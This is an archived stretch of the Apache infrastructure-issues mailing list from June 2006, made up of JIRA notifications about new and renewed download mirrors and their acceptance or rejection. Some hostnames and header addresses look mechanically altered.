script to remove svn auth credentials from the user accounts on our servers http://issues.apache.org/jira/browse/INFRA-343 INFRA-342 Develop a CLA processing tool http://issues.apache.org/jira/browse/INFRA-342 INFRA-341 Standardised form for requesting standard resources http://issues.apache.org/jira/browse/INFRA-341 INFRA-338 Create an automated way to keep crontabs synced with SVN http://issues.apache.org/jira/browse/INFRA-338 INFRA-334 Document service checklist as part of www.apache.org/dev/ http://issues.apache.org/jira/browse/INFRA-334 INFRA-330 Jira periodic issue summaries should include assignees http://issues.apache.org/jira/browse/INFRA-330 INFRA-315 SRS patch should be applied when available (SPF fail with mailinglists broken) http://issues.apache.org/jira/browse/INFRA-315 INFRA-261 Wiki change notifications need to look like they did before http://issues.apache.org/jira/browse/INFRA-261 INFRA-250 Enable e-mail comments for Bugzilla http://issues.apache.org/jira/browse/INFRA-250 INFRA-235 RFE: magic "revision" keyword in bugzilla comments http://issues.apache.org/jira/browse/INFRA-235 INFRA-227 Enable email tracking for Bugzilla http://issues.apache.org/jira/browse/INFRA-227 INFRA-222 anti-virus filtering overzealous for one specific list http://issues.apache.org/jira/browse/INFRA-222 INFRA-210 svnmailer breaks utility of diffs contained in SVN patches http://issues.apache.org/jira/browse/INFRA-210 From [email protected] Wed Jun 14 03:07:06 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4093 invoked from network); 14 Jun 2006 03:07:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 03:07:06 -0000 Received: (qmail 37890 invoked by uid 500); 14 Jun 2006 03:07:04 -0000 Delivered-To: [email protected] Received: (qmail 37632 invoked by uid 500); 14 Jun 2006 03:07:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 37621 invoked by uid 99); 14 Jun 2006 03:07:03 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jun 2006 20:07:03 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jun 2006 20:07:02 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A3A207141F9 for <[email protected]>; Wed, 14 Jun 2006 03:05:50 +0000 (GMT) Message-ID: <4402887.1150254350640.JavaMail.jira@brutus> Date: Wed, 14 Jun 2006 03:05:50 +0000 (GMT+00:00) From: "Federico Alvarez (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-800) New mirror in Argentina In-Reply-To: <20775586.1147380034175.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-800?page=comments#action_12416115 ] Federico Alvarez commented on INFRA-800: ---------------------------------------- URL of mirror: http://apache.wnpower.com Country where the mirror is located: Argentina Contact email address: [email protected] Update frequency: daily at 1:50 and 13:50 hs Rsync repository used: rsync.apache.org Approximate bandwidth: 100 Mbit I have configured my HTTP server as requested: Yes I have subscribed to the mirror maintainers mailing list: Yes Logo: http://www.wnpower.com/mirror_apache.gif URL: http://www.wnpower.com > New mirror in Argentina > ----------------------- > > Key: INFRA-800 > URL: http://issues.apache.org/jira/browse/INFRA-800 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Reporter: Federico Alvarez > > URL of mirror: http://apache.wnpower.com > Country where the mirror is located: Argentina > Contact email address: [email protected] > Update frequency: daily at 1:50 and 13:50 hs > Rsync repository used: rsync.apache.org > Approximate bandwidth: 100 Mbit > I have configured my HTTP server as requested: Yes > I have subscribed to the mirror maintainers mailing list: Yes > Logo: http://www.wnpower.com/mirror_apache.gif > URL: http://www.wnpower.com -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 14 03:36:52 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11123 invoked from network); 14 Jun 2006 03:36:51 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 03:36:51 -0000 Received: (qmail 61029 invoked by uid 500); 14 Jun 2006 03:36:48 -0000 Delivered-To: [email protected] Received: (qmail 60756 invoked by uid 500); 14 Jun 2006 03:36:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 60744 invoked by uid 99); 14 Jun 2006 03:36:46 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jun 2006 20:36:46 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jun 2006 20:36:45 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D8DFD714204 for <[email protected]>; Wed, 14 Jun 2006 03:35:32 +0000 (GMT) Message-ID: <12560094.1150256132858.JavaMail.jira@brutus> Date: Wed, 14 Jun 2006 03:35:32 +0000 (GMT+00:00) From: "Jeong, Heon (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-844) New Apache Mirror MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N New Apache Mirror ----------------- Key: INFRA-844 URL: http://issues.apache.org/jira/browse/INFRA-844 Project: Infrastructure Type: Improvement Security: public (Regular issues) Components: Mirrors Reporter: Jeong, Heon URL : http://ftp.kaist.ac.kr Country where the mirror is located : Korea, republic of Contact email address : [email protected] Update frequency : 1~2 per day Rsync repository used : rsync.apache.org Approximate bandwidth : 100Mbps I have followed the recommended configuration for my mirror : yes Logo : http://ftp.kaist.ac.kr/kaist-logo.png (link to: http://ftp.kaist.ac.kr ) -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Wed Jun 14 19:30:36 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88419 invoked from network); 14 Jun 2006 19:30:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jun 2006 19:30:35 -0000 Received: (qmail 26990 invoked by uid 500); 14 Jun 2006 19:28:25 -0000 Delivered-To: [email protected] Received: (qmail 24270 invoked by uid 500); 14 Jun 2006 19:28:00 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 23594 invoked by uid 99); 14 Jun 2006 19:27:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 12:27:50 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 14 Jun 2006 12:03:43 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2D0347141D1 for <[email protected]>; Wed, 14 Jun 2006 19:02:30 +0000 (GMT) Message-ID: <17797753.1150311750154.JavaMail.jira@brutus> Date: Wed, 14 Jun 2006 19:02:30 +0000 (GMT+00:00) From: "Steven Gonzales (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (INFRA-781) Please renew the mirror at our location In-Reply-To: <9278920.1146505666695.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-781?page=comments#action_12416240 ] Steven Gonzales commented on INFRA-781: --------------------------------------- Hi there. What is the status of this issue? It appears that I'm receiving daily updates to the mirror. > Please renew the mirror at our location > --------------------------------------- > > Key: INFRA-781 > URL: http://issues.apache.org/jira/browse/INFRA-781 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Environment: Fedora Core 4 > Apache 2.2.2 > Reporter: Steven Gonzales > > Please check the mirror at http://www.eng.lsu.edu/mirrors/apache, verify, and place into your mirrors list. > Apologies for any lapses. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Thu Jun 15 08:59:54 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20127 invoked from network); 15 Jun 2006 08:59:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 15 Jun 2006 08:59:52 -0000 Received: (qmail 50843 invoked by uid 500); 15 Jun 2006 08:59:48 -0000 Delivered-To: [email protected] Received: (qmail 50502 invoked by uid 500); 15 Jun 2006 08:59:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50483 invoked by uid 99); 15 Jun 2006 08:59:46 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jun 2006 01:59:46 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jun 2006 01:59:45 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E9874714204 for <[email protected]>; Thu, 15 Jun 2006 08:58:30 +0000 (GMT) Message-ID: <29958559.1150361910953.JavaMail.jira@brutus> Date: Thu, 15 Jun 2006 08:58:30 +0000 (GMT+00:00) From: =?utf-8?Q?Philippe_BAQU=C3=89_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Created: (INFRA-845) New mirror FRANCE MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N New mirror FRANCE ----------------- Key: INFRA-845 URL: http://issues.apache.org/jira/browse/INFRA-845 Project: Infrastructure Type: New Feature Security: public (Regular issues)=20 Components: Mirrors =20 Reporter: Philippe BAQU=C3=89 URL of mirror: http://apache.cict.fr/ Country where the mirror is located: FRANCE Contact email address: [email protected] Update frequency: 8hour Rsync repository used:rsync.eu.apache.org Approximate bandwidth: 100Mb I have configured my HTTP server as requested (yes/no) YES I have subscribed to the mirror maintainers mailing list (yes/no) YES --=20 This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 07:27:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77243 invoked from network); 16 Jun 2006 07:27:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 07:27:53 -0000 Received: (qmail 36626 invoked by uid 500); 16 Jun 2006 07:27:48 -0000 Delivered-To: [email protected] Received: (qmail 36313 invoked by uid 500); 16 Jun 2006 07:27:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 36275 invoked by uid 99); 16 Jun 2006 07:27:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 00:27:46 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 00:27:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3B2417141EF for <[email protected]>; Fri, 16 Jun 2006 07:26:30 +0000 (GMT) Message-ID: <3363840.1150442790239.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 07:26:30 +0000 (GMT+00:00) From: =?utf-8?Q?Philippe_BAQU=C3=89_=28JIRA=29?= <[email protected]> To: [email protected] Subject: [jira] Reopened: (INFRA-572) new mirror In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-572?page=3Dall ] =20 Philippe BAQU=C3=89 reopened INFRA-572: ---------------------------------- > new mirror > ---------- > > Key: INFRA-572 > URL: http://issues.apache.org/jira/browse/INFRA-572 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues)=20 > Components: Mirrors > Reporter: Philippe BAQU=C3=89 > > URL: http://apache.cict.fr/ and ftp://mirror.cict.fr/apache/ > COUNTRY: FRANCE > CONTACT: [email protected] > UPDATE FREQUENCY: 3 per day > RSYNC REPOSITORY USED: rsync.eu.apache.org > BANDWITH: 100Mb > I HAVE CONFIGURED my HHTP SERVER as resquested: YES > I HAVE SUBSCRIBED TO THE MIRROR LIST: YES --=20 This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 12:53:29 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 80796 invoked from network); 16 Jun 2006 12:53:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 12:53:25 -0000 Received: (qmail 88203 invoked by uid 500); 16 Jun 2006 12:53:12 -0000 Delivered-To: [email protected] Received: (qmail 87910 invoked by uid 500); 16 Jun 2006 12:53:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 87784 invoked by uid 99); 16 Jun 2006 12:53:09 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 05:53:09 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 05:51:47 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3BDEC71428D for <[email protected]>; Fri, 16 Jun 2006 12:50:31 +0000 (GMT) Message-ID: <5679123.1150462231221.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 12:50:31 +0000 (GMT+00:00) From: "MULTIDIST SARL (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (INFRA-837) New mirror in FRANCE In-Reply-To: <24850473.1149719850867.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-837?page=all ] MULTIDIST SARL updated INFRA-837: --------------------------------- Description: URL of mirror : apache.multidist.com Country where the mirror is located FRANCE Contact email address [email protected] Update frequency 1per day Rsync repository used rsync -rtlzv --delete rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist /home/mirrors/apache/ Approximate bandwidth 10Mb I have configured my HTTP server as requested (yes/no) YES I have subscribed to the mirror maintainers mailing list (yes/no) YES Logo http://www.multidist.com/images/multidist.gif Site : http://www.multidist.com was: URL of mirror : apache.multidist.com Country where the mirror is located FRANCE Contact email address [email protected] Update frequency 1per day Rsync repository used rsync -rtlzv --delete rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist /home/mirrors/apache/ Approximate bandwidth 10Mb I have configured my HTTP server as requested (yes/no) yes I have subscribed to the mirror maintainers mailing list (yes/no) no, but how can i do it? Logo http://www.multidist.com/images/multidist.gif Site : http://www.multidist.com > New mirror in FRANCE > -------------------- > > Key: INFRA-837 > URL: http://issues.apache.org/jira/browse/INFRA-837 > Project: Infrastructure > Type: Improvement > Security: public(Regular issues) > Components: Mirrors > Environment: Apache > Reporter: MULTIDIST SARL > > URL of mirror : apache.multidist.com > Country where the mirror is located FRANCE > Contact email address [email protected] > Update frequency 1per day > Rsync repository used rsync -rtlzv --delete rsync.eu.apache.orgacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bpache-dist /home/mirrors/apache/ > Approximate bandwidth 10Mb > I have configured my HTTP server as requested (yes/no) YES > I have subscribed to the mirror maintainers mailing list (yes/no) YES > Logo http://www.multidist.com/images/multidist.gif > Site : http://www.multidist.com -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:07:59 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 9064 invoked from network); 16 Jun 2006 14:07:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:07:55 -0000 Received: (qmail 41428 invoked by uid 500); 16 Jun 2006 14:07:52 -0000 Delivered-To: [email protected] Received: (qmail 41133 invoked by uid 500); 16 Jun 2006 14:07:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41077 invoked by uid 99); 16 Jun 2006 14:07:50 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:07:50 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:07:49 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id A161271428D for <[email protected]>; Fri, 16 Jun 2006 14:06:33 +0000 (GMT) Message-ID: <4364627.1150466793657.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:06:33 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-809) New mirror in Taiwan,mirror.tw In-Reply-To: <18085700.1147841595632.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-809?page=all ] Joshua Slive resolved INFRA-809: -------------------------------- Resolution: Fixed Thanks. This will be in the next update. > New mirror in Taiwan,mirror.tw > ------------------------------ > > Key: INFRA-809 > URL: http://issues.apache.org/jira/browse/INFRA-809 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Environment: 386base,redhat9.0 > Reporter: william chiu > > URL of mirror: http://ftp.mirror.tw/pub/apache/ > Country where the mirror is located: Tawian > Contact email address: [email protected] > Update frequency: daily at 6:35 and 12:35 hs(UTC+0800) > Rsync repository used: rsync.apache.org > Approximate bandwidth: 100 Mbit > I have configured my HTTP server as requested: Yes > I have subscribed to the mirror maintainers mailing list: Yes > Logo: http://www.mirror.tw/images/mirror.jpg > URL: http://www.mirror.tw/ -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:09:51 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10048 invoked from network); 16 Jun 2006 14:09:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:09:49 -0000 Received: (qmail 43121 invoked by uid 500); 16 Jun 2006 14:09:48 -0000 Delivered-To: [email protected] Received: (qmail 42865 invoked by uid 500); 16 Jun 2006 14:09:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 42848 invoked by uid 99); 16 Jun 2006 14:09:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:09:47 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:09:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 3AA1271428D for <[email protected]>; Fri, 16 Jun 2006 14:08:30 +0000 (GMT) Message-ID: <17460331.1150466910216.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:08:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-814) New Apache mirror In-Reply-To: <6988860.1148144375165.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-814?page=all ] Joshua Slive resolved INFRA-814: -------------------------------- Resolution: Invalid You seem to be corrupting various text files (and perhaps others) by converting them to html and adding a link to your site at the bottom. Sorry, but we do not accept mirrors that modify our content. > New Apache mirror > ----------------- > > Key: INFRA-814 > URL: http://issues.apache.org/jira/browse/INFRA-814 > Project: Infrastructure > Type: Task > Security: public(Regular issues) > Components: Mirrors > Environment: FreeBSD, Apache/1.3.31. > Reporter: Martin Eriksen > Priority: Minor > > URL of mirror: http://apache.rtin.bz/ > Country where the mirror is located: United States > Contact email address: [email protected] > Update frequency: every eight hour. > Rsync repository used: rsync.apache.org > Approximate bandwidth: 100Mbit/s > I have configured my HTTP server as requested: Yes > I have subscribed to the mirror maintainers mailing list: Yes > Best Regards, > Martin Eriksen -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:11:55 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 11581 invoked from network); 16 Jun 2006 14:11:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:11:53 -0000 Received: (qmail 45270 invoked by uid 500); 16 Jun 2006 14:11:48 -0000 Delivered-To: [email protected] Received: (qmail 44965 invoked by uid 500); 16 Jun 2006 14:11:47 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44954 invoked by uid 99); 16 Jun 2006 14:11:47 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:11:46 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:11:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 26C6E71428D for <[email protected]>; Fri, 16 Jun 2006 14:10:30 +0000 (GMT) Message-ID: <13847939.1150467030146.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:10:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-817) New Low Speed Mirror in Australia In-Reply-To: <17429974.1148362625849.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N [ http://issues.apache.org/jira/browse/INFRA-817?page=all ] Joshua Slive resolved INFRA-817: -------------------------------- Resolution: Invalid Sorry, but I can't connect to this mirror. In addition, based on your listed bandwidth, I don't think it would be a good idea for us to list you. We could use a substantial portion of that. In addition, we don't offer ftp updates, so I'm not sure where that comes from. > New Low Speed Mirror in Australia > --------------------------------- > > Key: INFRA-817 > URL: http://issues.apache.org/jira/browse/INFRA-817 > Project: Infrastructure > Type: New Feature > Security: public(Regular issues) > Components: Mirrors > Environment: WINXP, Apache 2.2 > Reporter: Don Carter > Priority: Trivial > > URL of mirror: http://www.d21technologies.com/apache/mirror/ > FTP Server: ftp://www.d21technologies.com/apache/mirror/ > Country of Mirror: Australia > Contact Email Address: [email protected] > Update frequency : 2 times daily via ftp > Bandwidth:213/40 kbps (tested) > Will be increasing bandwidth soon. -- This message is automatically generated by JIRA. - If you think it was sent incorrectly contact one of the administrators: http://issues.apache.org/jira/secure/Administrators.jspa - For more information on JIRA, see: http://www.atlassian.com/software/jira From [email protected] Fri Jun 16 14:17:02 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13519 invoked from network); 16 Jun 2006 14:16:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jun 2006 14:16:59 -0000 Received: (qmail 51502 invoked by uid 500); 16 Jun 2006 14:16:36 -0000 Delivered-To: [email protected] Received: (qmail 51010 invoked by uid 500); 16 Jun 2006 14:16:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <infrastructure-issues.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50374 invoked by uid 99); 16 Jun 2006 14:16:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:16:29 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 16 Jun 2006 07:15:46 -0700 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 2FDEF71428D for <[email protected]>; Fri, 16 Jun 2006 14:14:30 +0000 (GMT) Message-ID: <24669923.1150467270193.JavaMail.jira@brutus> Date: Fri, 16 Jun 2006 14:14:30 +0000 (GMT+00:00) From: "Joshua Slive (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Resolved: (INFRA-803) new mirror In-Reply-To: <2604240.1147550230551.JavaMail.root@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org 